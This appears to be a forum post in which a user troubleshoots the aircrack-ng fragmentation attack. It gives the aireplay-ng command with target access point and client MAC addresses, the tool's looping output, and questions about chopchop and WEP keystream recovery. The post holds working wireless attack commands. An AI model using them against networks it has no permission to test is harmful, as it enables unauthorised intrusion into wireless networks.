Hello,
I have downloaded the SVN version of aircrack-ng to try the fragmentation attack.
I am using an Atheros chipset and madwifi-ng drivers. Packet injection works on my system.
Here is what I run in monitor mode locked to the AP channel:
./aireplay-ng -5 ath0 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -l 192.168.55.117
-b 00:14:6C:7E:40:80 Access Point
-h 00:0F:B5:AB:CB:9D MAC address of associated client
-l 192.168.55.117 IP address of associated client
I get a continuous stream of messages like this:
Trying to get 408 bytes of a keystream
No answer, repeating...
Still nothing, trying another packet...
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
No answer, repeating...
Trying to get 408 bytes of a keystream
Trying a LLC NULL packet
No answer, repeating...
Trying to get 408 bytes of a keystream
I also tried the original code:
http://homepages.tu-darmstadt.de/~p_larbig/wlan/afrag-0.1.tar.bz2 and I am also not successful.
My questions:
- Is the command I used properly formatted?
- Which IP are you supposed to use? The client? A client on the ethernet? Etc.?
- On my access point when you use chopchop, it always has the warning "Warning: ICV checksum verification FAILED!". The xor stream can always be used successfully. Would this be a hint as to why the fragmentation attack does not work on my access point?
- Are there any debugging techniques I can use?
Thanks,
d.